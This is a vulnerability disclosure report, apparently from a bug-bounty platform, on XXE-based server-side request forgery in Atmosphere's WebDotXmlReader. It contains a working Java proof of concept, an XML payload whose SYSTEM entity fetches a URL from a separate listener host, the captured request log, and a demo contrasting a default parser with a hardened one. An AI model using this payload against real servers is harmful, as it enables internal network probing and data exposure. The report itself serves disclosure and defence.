Improper Restriction of XML External Entity Reference in atmosphere/atmosphere

Valid

Reported on

Oct 7th 2021


Description

Atmosphere is vulnerable to Server-Side Request Forgery (SSRF) through XML External Entity (XXE) injection. The WebDotXmlReader constructor in WebDotXmlReader.java parses the supplied stream with external entity resolution left enabled, so an attacker who can supply a crafted XML document can declare a SYSTEM entity pointing at an arbitrary URL and the parser, running on the server, fetches that URL on the attacker's behalf. The proof of concept below demonstrates this with an entity that causes an outbound HTTP request to an attacker-controlled host.

Proof of Concept

import java.io.FileInputStream;
import java.io.InputStream;

import org.atmosphere.util.WebDotXmlReader;

public class Poc {

    // wxmlreader is never used: constructing it is enough to trigger the parse.
    @SuppressWarnings("unused")
    public static void main(String[] args) {
        try {
            // Attacker-controlled XML (see sample_ssrf.xml below); the path is local to the reporter's workspace.
            InputStream inputStream = new FileInputStream("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            // The constructor parses the stream; the external entity is resolved during that parse.
            WebDotXmlReader wxmlreader = new WebDotXmlReader(inputStream);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample_ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://192.168.1.16:8800/text.txt">]>
<foo>&xxe;</foo>

Output

└─# python3 -m http.server 8800
Serving HTTP on 0.0.0.0 port 8800 (http://0.0.0.0:8800/) ...
192.168.1.57 - - [07/Oct/2021 16:39:07] "GET /text.txt HTTP/1.1" 200 -
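
The GET request above appears because the parser resolves the SYSTEM entity before the document is handed back to the application. The following is an added example, not code from the original report or from the Atmosphere project: it parses the same DOCTYPE with a default JAXP DocumentBuilderFactory and then with a hardened one, using a loopback HttpServer in place of the 192.168.1.16:8800 listener so it runs offline. The class name XxeSsrfDemo, the listener, and the choice of DocumentBuilderFactory as the parser are this example's own assumptions; the report does not state which parser WebDotXmlReader uses internally.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.concurrent.atomic.AtomicInteger;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

import com.sun.net.httpserver.HttpServer;

public class XxeSsrfDemo {

    /** Number of requests that reached the attacker-controlled listener. */
    static final AtomicInteger hits = new AtomicInteger();

    /** Loopback HTTP listener standing in for the python3 http.server in the report (assumption: any port). */
    static HttpServer startListener() throws IOException {
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/text.txt", exchange -> {
            hits.incrementAndGet();
            byte[] body = "hello from listener".getBytes(StandardCharsets.UTF_8);
            exchange.sendResponseHeaders(200, body.length);
            exchange.getResponseBody().write(body);
            exchange.close();
        });
        server.start();
        return server;
    }

    /** Same structure as sample_ssrf.xml, with the entity URL pointed at the local listener. */
    static String payload(int port) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:" + port + "/text.txt\">]>\n"
             + "<foo>&xxe;</foo>";
    }

    /** Out-of-the-box JAXP settings: DOCTYPE accepted, external general entities fetched and inlined. */
    static DocumentBuilder vulnerableBuilder() throws Exception {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    /**
     * Hardened settings. Rejecting the DOCTYPE outright is the single decisive control;
     * the remaining flags are defence in depth for parsers that ignore that feature.
     */
    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parse and return the text content of the root element (the expanded entity, if any). */
    static String parse(DocumentBuilder b, String xml) throws Exception {
        Document d = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return d.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        HttpServer listener = startListener();
        try {
            String xml = payload(listener.getAddress().getPort());

            // Vulnerable path: the listener records one GET and the response body lands inside <foo>.
            String text = parse(vulnerableBuilder(), xml);
            System.out.println("default parser: <foo> = \"" + text + "\", listener hits = " + hits.get());

            // Hardened path: the DOCTYPE is rejected before any entity is declared, so no request is made.
            try {
                parse(hardenedBuilder(), xml);
                System.out.println("hardened parser: unexpectedly accepted the DOCTYPE");
            } catch (SAXParseException e) {
                System.out.println("hardened parser: rejected (" + e.getMessage() + "), listener hits = " + hits.get());
            }
        } finally {
            listener.stop(0);
        }
    }
}
```

Run with `java XxeSsrfDemo.java` on JDK 11 or later. The first parse prints the listener's response body as the content of <foo> and a hit count of 1; the second throws a SAXParseException and leaves the count unchanged. If the application genuinely needs DTDs, drop the disallow-doctype-decl feature but keep the other flags, which still block the SYSTEM entity fetch.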

Timeline

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the atmosphere team and are waiting to hear back 2 months ago
atmosphere/atmosphere maintainer validated this vulnerability a month ago
Srikanth Prathi has been awarded the disclosure bounty
The fix bounty is now up for grabs
atmosphere/atmosphere maintainer confirmed that a fix has been merged on efb38e a month ago
The fix bounty has been dropped